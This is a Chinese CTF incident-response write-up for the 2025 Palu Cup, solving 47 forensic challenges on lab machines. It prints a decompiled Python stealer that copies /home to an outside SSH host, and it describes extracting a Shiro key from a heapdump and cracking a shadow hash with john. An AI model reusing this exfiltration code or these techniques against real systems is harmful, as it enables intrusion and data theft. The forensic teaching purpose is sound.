2025第二届帕鲁杯应急响应wp主线
本文最后更新于29 天前,其中的信息可能已经过时,如有错误请发送邮件到1416359402@qq.com

主线

说明文档下载

题目下载:

通过网盘分享的文件:应急响应主线
链接: https://pan.baidu.com/s/1GMD81OBwwmm2wDQAsyMUbg 提取码: 6180

解压密码:

Skills@@@Skills@@@Skills

主机名IP 地址操作系统登录服务登录
JumpServer192.168.20.100ubuntu/ubuntuhttp://192.168.20.100/ admin/Skills@2020
sshServer192.168.20.108ubuntu/Skills@sshserver 
Server01192.168.20.103ubuntu/Skills@serverhttp://192.168.20.103:16303/9bbe149955 c394c5de46/e36c392092 http://192.168.20.102:3000/ admin@qq.com/未知
Mysql192.168.20.101ubuntu/Skills@mysqlhttp://192.168.20.101:20221/4a883f0c56 64a44f8137/f8941f8eb7 root/mysql_QPiS8y
Waf192.168.20.102ubuntu/Skills@wafhttps://192.168.20.102:9443/ admin/VF6NXMs7
palu01192.168.20.200Parloo/Skills@01 
palu02192.168.20.201Parloo/Skills@02 
palu03192.168.20.202Parloo/Skills@03此靶机为”近源”对应靶机

solar_Linux后门排查

跳板机疑似被遗留后门,请排查
1、找到可疑进程完整路径
2、找到被横向的服务器IP
3、连接被横向服务器
flag格式为 flag{base64{完整路径}|服务器IP|服务器中flag文本}
root:Solar@2025_05_palu!

先改一下网关

1.提交堡垒机中留下的flag

登录jumpserver堡垒机:
标签列表中可以看到flag

http://192.168.20.100/ 直接登录堡垒机

账号/密码 admin/Skills@2020

在标签列表看到答案

palu{2025_qiandao_flag}

2.提交WAF中隐藏的flag

登录WAF,https://192.168.20.102:9443/ admin/VF6NXMs7

身份认证的配置用户管理中存在flag

palu{2025_waf}

3.提交Mysql中留下的flag

Navicat远程连接数据库,并查看

http://192.168.20.101:20221/4a883f0c56 64a44f8137/f8941f8eb7 root/mysql_QPiS8y

远程连接一下

palu{Mysql_@2025}

4.提交攻击者的攻击IP

一般先从web打进来,然后横向到PC机 所以要登上WAF看看

直接查看waf的攻击日志,找到发起大量攻击的ip

palu{192.168.20.107}

5.提交攻攻击者最早攻击时间flag格式为palu{xxxx-xx-xx-xx:xx:xx}

在第四题已经看到了

palu{2025-05-05-00:04:40}

6.提交web服务泄露的关键文件名

web服务是80端口,找到对应的防护应用

在WAF

防护应用看看

发现可以文件

复制路径访问

http://192.168.20.102/bak/key.txt

发现就是泄露的文件

ssh密钥登录的一些知识点:
在远程登录服务器或访问其他需要 SSH 认证的服务时,可使用该密钥对进行身份验证。将公钥配
置在服务器上,私钥保留在本地。当本地客户端尝试连接服务器时,服务器会向客户端发送一个
加密的随机字符串,客户端使用私钥对其进行解密,然后将解密后的数据发送给服务器进行验
证。如果验证成功,客户端就可以无需输入密码而直接登录到服务器,这种方式比传统的密码验
证更为安全和便捷。
在企业业务服务器使用密钥认证的场景中,A 刚入职主管问 A 要的通常是公钥。具体过程如下:

  1. A 在自己的设备上生成密钥对,包括公钥和私钥。
  2. A 将生成的公钥提供给主管,主管把公钥配置到业务服务器的授权文件中
    (如 ~/.ssh/authorized_keys )。
  3. A 使用自己的私钥通过客户端发起登录请求,服务端会通过公钥加密一个随机字符串,客户
    端再通过私钥解密该字符串返回给服务端,通过对比两个字符串是否一致来认证身份。
    业务服务器上会有很多公钥,每个需要登录服务器的用户都有自己的公钥被存储在服务器上,以
    此来实现基于密钥的身份认证,这种方式比传统的账号密码认证更安全,可避免密码在网络上传
    输带来的安全风险

所以文件名字就是

key.txt

palu{key.txt}

7.题解泄露的邮箱地址

在上一题我们已经看到了

palu{parloo@parloo.com}

8.提交立足点服务器ip地址

立足点(Footprint)在网络安全领域通常指:
攻击者通过渗透测试或攻击手段,在目标网络中成功控制的第一台主机或服务器。这台服务器成
为攻击者进一步渗透内部网络的跳板或基地,因此被称为 “立足点服务器”。

“立足点服务器IP”通常是指在网络安全或渗透测试中,攻击者用来作为跳板或中转的服务器IP地址。这类服务器可能是被攻击者控制的设备,用于隐藏真实攻击源或作为进一步攻击的起点。

具体含义:

  1. 跳板作用:攻击者通过入侵或利用某些服务器(即“立足点”),将其作为中转站发起后续攻击,避免直接暴露自己的真实IP。
  2. 隐匿行踪:通过多层跳板(如“代理链”或“Tor网络”),增加追踪难度。
  3. 长期控制:攻击者可能长期维护这些服务器,作为后续攻击的基地(如APT攻击中的“持久化”)。

其实内网几台主机的ip,试试就能出来,看了很多wp,估计都是试出来的
在雷池waf中,192.168.20.108是资产表中的sshServer主机的地址,这个主机是我们的资产,且在
waf中留下了它很多次攻击,所以它就是立足点服务器ip地址

palu{192.168.20.108}

9.提交攻击者使用的提权的用户和密码提交格式palu{账号/密码}

因为上一题已经知道立足点的服务器了192.168.20.108

所以启动ssH Server服务器

账号密码:ubuntu/Skills@sshserver

输入密码后发现直接卡住了

直接CTRL+C就可以进入了

cat /etc/passwd 查看用户

发现最底下有个parloo用户 ,拥有/bin/sh所以可以怀疑是攻击者

打开server1的机子,打开管理面板,其中管理着两个web网站,其中一个写了员工账户密码,猜测parloo密码为parloo

palu{parloo/parloo}

10.提交攻击者留下的的文件内容作为flag提交

在sshserver机子中,/home目录下找到parloo用户家目录,找到flag

palu{hi_2025_parloo_is_hack}

11.提交权限维持方法服务的名称

前置知识

/etc/systemd/system/Linux 系统(使用 systemd 作为初始化系统) 中的一个关键目录,主要用于存储用户或管理员自定义的系统服务单元文件(unit files)

添加自定义服务

(1)编辑

PLAINTEXT

sudo vim /etc/systemd/system/myapp.service

内容示例:

PLAINTEXT

[Unit]
Description=My Custom App
After=network.target

[Service]
ExecStart=/usr/bin/myapp
User=myuser

[Install]
WantedBy=multi-user.target

(2)重载配置
修改后需让 systemd 重新加载:

PLAINTEXT

sudo systemctl daemon-reload
sudo systemctl enable --now myapp.service

1、在/etc/systemd/system目录中发现rootset.service。

这个 rootset.service 文件是一个典型的 systemd 后门服务,攻击者通过它实现 权限维持(Persistence),确保恶意程序在系统重启后仍能自动运行。以下是具体分析:

恶意特征分析

(1)可疑的可执行文件路径

PLAINTEXT

ConditionFileIsExecutable=/usr/bin/b4b40c44ws
ExecStart=/usr/bin/b4b40c44ws
  • 文件名 b4b40c44ws 是随机字符串(无意义命名),明显是为了躲避检测(如 ls /usr/bin 时不易被发现)。
  • 路径在 /usr/bin/ 下,伪装成合法系统程序。

(2)服务配置的恶意行为

  • Restart=always + RestartSec=120
    如果恶意进程崩溃或被杀,systemd 会每 120 秒自动重启它,确保后门持续运行。
  • StartLimitInterval=5 + StartLimitBurst=10
    允许短时间内多次重启(防触发 systemd 的启动限制)。

(3)持久化安装

PLAINTEXT

[Install]
WantedBy=multi-user.target
  • 服务被链接到 multi-user.target(标准多用户运行级别),系统启动时会自动运行

(4)环境变量隐藏

PLAINTEXT

EnvironmentFile=-/etc/sysconfig/rootset
  • /etc/sysconfig/rootset 加载环境变量(- 表示忽略文件不存在错误)。
  • 攻击者可能通过该文件传递隐蔽参数(如 C2 服务器地址)。

攻击者如何利用它?


  1. 上传恶意程序
    将后门木马(如反向 Shell、挖矿程序)放到 /usr/bin/b4b40c44ws



  2. 创建服务
    通过 rootset.service 确保恶意程序以 root 权限持久化。



  3. 激活服务


    PLAINTEXT

    systemctl daemon-reload
    systemctl enable --now rootset.service # 开机自启 + 立即运行


  4. 维持访问
    即使管理员杀死进程,systemd 也会重新启动它。


检测与清除方法

  1. 检查服务状态
PLAINTEXT

systemctl status rootset.service  # 查看是否正在运行
journalctl -u rootset.service    # 查看日志
  1. 删除恶意文件
PLAINTEXT

sudo systemctl stop rootset.service
sudo systemctl disable rootset.service
sudo rm /etc/systemd/system/rootset.service
sudo rm /usr/bin/b4b40c44ws      # 删除恶意程序
sudo systemctl daemon-reload
  1. 排查其他痕迹

  • 检查 /etc/sysconfig/rootset(环境变量文件)。



  • 搜索其他可疑服务:


    PLAINTEXT

    ls -la /etc/systemd/system/ /usr/lib/systemd/system/
    grep -r "ExecStart" /etc/systemd/system/

  1. 安全加固

  • 监控 /usr/bin//etc/systemd/system/ 的文件变化(如使用 auditdtripwire)。



  • 限制 systemd 服务创建权限:


    PLAINTEXT

    chmod 750 /etc/systemd/system/ # 仅允许 root 写入

所以 权限维持方法服务名称为rootset.service

查看运行端口也能看到恶意程序名字

发现了外联ip启动恶意程序为b4b40c4ws

我们先看看b4b40c4ws在哪?

因为考虑到我们的sshserver机器是重启之后的,重启之后还有这个恶意外联,所以可能存在定时
任务或服务自启动项,因为题目问的是维权方法服务的名称,所以大概率就是使用的服务自启动

查看 PID 对应的 systemd 服务有两种方法
直接使用命令查看:
systemctl status pid号,可以发现维权服务

就可以看到恶意服务

palu{rootset}

12.提交攻击者攻击恶意服务器连接地址作为flag提交

在上一题已经分析找到了外联地址了

其他方法

cp /usr/bin/b4b40c44ws home/ubuntu

下载

直接将b4b40c44ws拖入ida分析,反汇编后直接可以看到ip地址

丢到微步也是一样的:

palu{47.101.213.153}

13.找到系统中被劫持的程序程序名作为flag提交

ls -alh /usr/bin /bin /usr/sbin /sbin | grep -vE 'root|staff|bin'

这条命令的意思是:在系统核心可执行目录中,找出“文件属主不是常规系统用户”的可疑程序。
这些目录包含绝大多数的系统命令:
/bin :基础命令,如 ls 、cp 、mv …
/usr/bin :扩展命令,如 vim 、nano 、python3 …
/sbin :系统管理命令,如 ifconfig 、reboot
/usr/sbin :更多的管理命令,如 sshd 、apache2
在 /bin 、/usr/bin 等系统命令目录中,绝大部分程序都应该属于 root(或者极少数属于 bin、
staff)。
⚠️ 如果你看到有文件的拥有者是:
ubuntu 、www-data 、nobody
某个普通用户
UID 不是 0(非 root)

那说明这个程序不是由系统正常安装的,可能是攻击者放进去的伪装程序、后门、木马。

id是系统命令不可能属于ubuntu的用户和用户组

palu{id}

ps -ef 找到

也可以看到

palu{id}

14.找到系统中存在信息泄露的服务运行端口作为flag提交

进入server01服务器

查看开放了那些端口

或者namap扫描或者Fscan扫描

fscan -h 192.168.20.103 -full

发现8081端口是个人事管理系统非常容易泄露

看看

居然可以看到员工的详细信息所以这个就是泄露端口

palu{8081}

15.提交Parloo公司项目经理的身份证号作为flag提交

上一个题就可以看到

palu{310105198512123456}

16.提交存在危险功能的操作系统路径作为flag提交。flag格式为palu{/xxx/xxx}

看192.168.20.103:3000端口

在探索中只有一个公开仓库

无身份验证

http.HandleFunc("/admin/parloo", func(w http.ResponseWriter, r *http.Request) {
  • 风险:任何人都可以访问 /admin/parloo 路径并执行命令
  • 攻击:攻击者可以直接访问此接口,无需任何登录凭证

本身是一个go写的代码,代码逻辑:通过 /admin/par1o。路径提供 Web 界面,支持 GET显示表单)和 POST(执行命令)请求。

这个路径很危险

可以进行命令执行

palu{/admin/parloo}

17.提交进源机器中恶意程序的MD5作为flag进行提交。flag格式为palu[MD5小写}

资产图中明确告诉了近源机器

进入

这个是个木马病毒 所以这个很有可能就是我们的目标

搜索一下就可以发现这个

直接复制到桌面上

扫描

palu{0f80a82621b8c4c3303d198d13776b34}

18.提交攻击者留下的恶意账户名称md5后作为flag进行提交。 格式为palu{md5{xxxxx}}

进入近源靶机就已经看到了

md5 hack加密一下就行

palu{d78b6f30225cdc811adfe8d4e7c9fd34}

19.提交内部群中留下的flag并提交

进入近源靶机

palu{nbq_nbq_parloo}

20.请提交攻击者使用维护页面获取到的敏感内容作为flag进行提交

维护页面就是之前看到的:
http://192.168.20.103:8080/admin/parloo
还要结合之前在gitea看到的维护页面的源码
维护页面源码中写了日志保存到command.log页面

我们去192.168.20.103那个服务器上去找command.log在哪

进入parloohack用户目录下

find / -name command.log

根据这个目录查找看看

发现这个parloo目录下面有这个文件日志

cat /opt/parloo/command.log
这个里面没有东西
 cat /var/log/parloo/command.log

翻翻找找

找到答案 palu{Server_Parloo_2025}

21.提交获取敏感内容IP的第一次执行命令时间作为flag进行提交。flag格式为palu[xxxx-xx-xx:xx:xx:xx}

根据上一题查查192.168.20.1的IP地址 最早提交的时间就行

大概可以理解成攻击者使用维护页面第一次命令执行的时间

2025-05-04 15:30:38
palu{2025-05-04:15:30:38}

22.提交攻击者使用的恶意ip和端口flag格式为palu[xx.xx.xx.xx:xxxx}

还是原来的那个日志就可以看到恶意IP端口

palu{10.12.12.13:9999}

23.提交重要数据的名文内容作为flag提交

进源机器进入就有那个重要数据

c3a1c3c13e326020c3919093e1260525045e

然后这个md5还是36位的

因为是近源那台机器的数据嘛,近源那台机器账号为hack
恰好gitea中也有个叫hack的用户

登录一下这个账号

不知道密码查看MySQL数据库user

看到密码,还有一个flag palu{crP1ZIVfqrkfdhGy}

然后我们注册一个账户,将账户的密码和掩值给他替换成我们注册账户的密码和掩值

然后就可以登录hack的账户了

就可以发现他的加密脚本

def custom_encrypt(text, key):
    encrypted = []
    key_bytes = [ord(c) for c in key]

    for i, char in enumerate(text):
        shifted = ord(char) + (i % 5 + 1)

        xor_key = key_bytes[i % len(key_bytes)]
        xored = shifted ^ xor_key
        substituted = ((xored & 0x0F) << 4) | ((xored & 0xF0) >> 4)
        encrypted.append(f"{substituted:02x}")
    return "".join(encrypted)

可以直接把加密脚本给ai,让ai给逆向算法,但是实际操作时发现解密也需要key,但是我们又不
知道key,我们给ai一些可能的条件,比如明文的前几个字符大概率时palu{,最有一个字符是},
但是ai也只能通过这些条件解密出部分key来,其余的要么猜出key来,要么爆破出key来

可以证明key的前几个字符为MySec,看了wp,最后的key是MySecretKey

一直明文的前几个字符是palu{ 可以得到密钥的前几个字符,最后试出密钥 MySecretKey

def custom_decrypt(encrypted_hex, key):
    encrypted_bytes = [int(encrypted_hex[i:i+2], 16) for i in range(0, len(encrypted_hex), 2)]
    key_bytes = [ord(c) for c in key]
    decrypted = []

    for i, byte in enumerate(encrypted_bytes):
        # Reverse substitution: swap nibbles back
        substituted = ((byte & 0x0F) << 4) | ((byte & 0xF0) >> 4)

        # Reverse XOR
        xor_key = key_bytes[i % len(key_bytes)]
        xored = substituted ^ xor_key

        # Reverse shift
        shifted = xored - (i % 5 + 1)

        decrypted.append(chr(shifted))

    return ''.join(decrypted)

# Given data
encrypted_hex = "c3a1c3c13e326020c3919093e1260525045e"
key = "MySecretKey"

# Decrypt
plaintext = custom_decrypt(encrypted_hex, key)
print("Decrypted plaintext:", plaintext)

palu{Password-000}

24.提交恶意维权软件的名称作为flag进行提交

恶意维权软件,他既然说软件了,大概率就是windows主机,之前在近源机器中发现启动项有一
个未知文件 ,就是刚启动那个parloo03的近源机子,进入就会出来一个程序

就是这个应用

在17题里面有的

palu{svhost}

25.提交恶意程序的外联地址

我们用Everything

按照时间排序找找看看

5月14时间左右

我们发现一个ipconfig.exe的py文件

看到了这个ipconfig.exe,之前分析维工具的时候就看到了这个python文件,太显眼了,一般都是
有问题的文件。本来想着运行下直接看外联地址,结果发现exe根本无法运行,一运行就报错。只
能反编译分析一下了。
python反编译的过程,总体逻辑就两步:
1、将.exe反编译成.pyc的二进制文件
2、将.pyc文件反编译成.py文件
首先需要下载pyinstxtractor.py

发现敏感文件,然后反编译

直接去在线网站进行pyc反编译
https://tool.lu/pyc

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.8

import os
import paramiko
from scp import SCPClient
from pathlib import Path

def create_ssh_client(server, port, username, password, key_path = (None, None)):
    '''
    创建SSH客户端连接
    '''
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# WARNING: Decompyle incomplete

def transfer_directory(scp, local_path, remote_path):
    '''
    递归传输目录
    '''
    for item in os.listdir(local_path):
        local_item = os.path.join(local_path, item)
        if os.path.islink(local_item):
            print(f'''跳过符号链接: {local_item}''')
            continue
        remote_item = os.path.join(remote_path, item)
        if os.path.isdir(local_item):

            try:
                scp.mkdir(remote_item)
            finally:
                pass
            transfer_directory(scp, local_item, remote_item)
            continue
            print(f'''传输文件中: {local_item}''')
            scp.put(local_item, remote_item)
            continue
            return None

def main():
    ssh_config = {
        'server': '88.173.90.103',
        'port': 22,
        'username': 'ubuntu',
        'password': 'OOWPWPWADADA' }
    local_home = '/home'
    remote_base = '/home/ubuntu/backup_home'
# WARNING: Decompyle incomplete

if __name__ == '__main__':
    main()

可得到flag:
palu{88.173.90.103}

26.提交攻击这使用的恶意dnslog域名作为flag进行提交

之前在做维护页面命令执行日志查看的时候发现了一些dnslog地址,尝试选几个提交

palu{np85qqde.requestrepo.com}

27.提交寻找反序列化漏洞的端口作为flag进行提交

在WAF中

过滤未拦截的反序列化 只有这一个响应报文是302所以端口就是这个

或者是直接看这个

海康的综合安防平台就一直报反序列化漏洞,所以尝试提交9999端口所以就是了

palu{9999}

28.提交web服务泄露的密钥作为flag进行提交

跟着上一题27

扫描一下192.168.20.103:9999

发现扫描除了shiro框架然后又有heapdump,可以通过heapdump拿到
了shiro的key,然后打的shiro反序列化

访问http://192.168.20.103:9999/actuator/heapdump,拿到heapdump
使用jdumpspider提取heapdump中的敏感信息

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

发现了shirokey

QZYysgMYhG6/CzIJlVpR2g== 这个就是密钥

palu{QZYysgMYhG6/CzIJlVpR2g==}

29.提交攻击者开始攻击的时间作为flag进行提交。flag格式为palu[xxxx/xx/xx:xx:xx:xx}

在WAF中可以找到192.168.20.103/9999的 访问日志

palu{2025/05/13:16:45:19}

30提交攻击者在server中留下的账户密码作为flag进行提交。flag格式为palu[username/password}

返回server01

cat /ect/passwd
cat /etc/shadow

查看密码

parloohack:$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl791:20221:0:99999:7:::
$y$j9T$RlIs4rqy6D2PI46ntcuwZ0$WFD6WgX3XC4zp/5Y.Jq9yLcfhHK5Rdg6IeDq2Rrl791

写个1.txt将上面的内容复制过去

kali 里面

john -format=crypt 1.txt

解码

密码就是123456

palu{parloohack/123456}

31.提交攻击者维权方法的名称作为flag进行提交

在30题我们已经知道这个用户的密码,直接登录这个账户

登录上

history 命令查看历史

就会发现

发现黑客写了一个恶意的服务,并且把这个服务作为开启自启动,是一种维权方式
palu{parloohack_script.service}

32.提交攻击者留下的木马md5后作为flag进行提交

还是parloohack的日志

历史命令

发现黑客对aa这个可执行文件进行了md5记录

发现aa就在当前文件下,使用md5sum进行加密即可

palu{4123940b3911556d4bf79196cc008bf4}

33.提交攻击者留下的溯源信息作为flag进行提交

在palu 2中 Parloo/Skills@02

三台pc机器 paloo2有个谷歌浏览器

查看一下历史记录

就会发现一个外联IP

vshell,黑客无疑了,服务器地址也泄露了47.101.218.153

在谷歌浏览器里面设置密码管理器可以看到密码

用户名
841366067
密码
pwn3rzs
备注
palu{X5E1yklz1oAdyHBZ}

另一个

c2.com
用户名
admin
密码
admin@qwer
备注
未添加任何备注

攻击者留下的溯源信息就是这个

palu{X5E1yklz1oAdyHBZ}

34.提交攻击者的githubID作为flag进行提交

vshell的用户名是qq号(我过他是github的用户名,就没想过他是qq号,)

841366067

用手机搜索

palu{ParlooSEc}

35.提交攻击者在github下留下的的内容作为flag进行提交

直接访问攻击者的github地址:
https://github.com/ParlooSEc/fffflllgggg

palu{s5o3WkX33hptyJjk}

36.提交恶意用户的数量作为flag进行提交

在pc1启动看到了好多恶意用户

一个99个

palu{99}

37.提交恶意用户的默认密码作为flag进行提交

根据前面的经验,parloohack的默认密码都是123456,那么这个的默认密码是不是也是123456

结果发现123456可以登录进去所以密码就是123456

但是也可提取出那些恶意用户的凭证,猕猴桃爆破,再爆hash。

palu{123456}

38.提交业务数据中攻击者留下的信息作为flag进行提交

之前在MYSQL数据库里面就看到了

palu{crP1ZIVfqrkfdhGy}

39.提交私人git仓库中留下的内容作为flag进行提交

跟原来登录hack的账户一样的方法直接替换创建用户的密码

登录

结果发现可以直接看所有的私有库信息

cGFsdXtGTzY1U3J1dVR1a2RwQlM1fQ==

palu{FO65SruuTukdpBS5}

40.提交存在在mysql服务器中的恶意程序的MD5作为flag进行提交

进入MySQL服务器中

netstat -anplt
ps -aux

未发现异常

别人的wp

题目做到了现在,我们已经可以理出时间线来了,5月2日是目前攻击最早的时间(对于整个应
急题的时间线来说,主线题还要靠后。最晚时间就是15号,16号都已经发压缩包了)
查找其他可疑目录中修改的可执行文件:

sudo find /tmp /var/tmp /dev/shm /home /root -type f -perm /a+x
( -newermt "2025-05-02" ! -newermt "2025-05-16" )
-exec ls -la {} ; 2>/dev/null | sort -k6,7

发现执行了一个文件

就在root目录里面

计算md5

 md5sum .a

palu{ba7c9fc1ff58b48d0df5c88d2fcc5cd1}

41.提交恶意程序中模拟c2通信的函数名称作为flag进行提交

将.a的文件复制到主机上面IDA逆向分析

sudo cp /root/.a /home/ubuntu

发现函数名字

palu{simulate_network_communication}

42.提交恶意程序创建隐藏文件的名称作为flag提交

看见函数,直接就看到了

/tmp/.malware_log.txt

palu{.malware_log.txt}

43.提交恶意程序中模拟权限提升的函数作为flag进行提交

就是这个函数

palu{simulate_privilege_escalation}

44.提交被钓鱼上线的用户名作为flag进行提交

在palu02 看内网通的时候有个记录

所以是Parloo-子怡被钓鱼了
palu{Parloo-子怡}

45.提交恶意程序的所在路径作为flag进行提交

和44题照应直接就有地址了

palu{C:UsersPublicNwtcacherecvParloo-沉沉}

46.分析恶意程序的反连地址作为flag进行提交

谷歌浏览器有那个vshell的地址
palu{47.101.213.153}

47.提交恶意c2的服务器登录的账号密码作为flag进行提交。flag格式为palu[username/password}

就是33题我们做的那个

palu{admin/admin@qwer}

文末附加内容
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇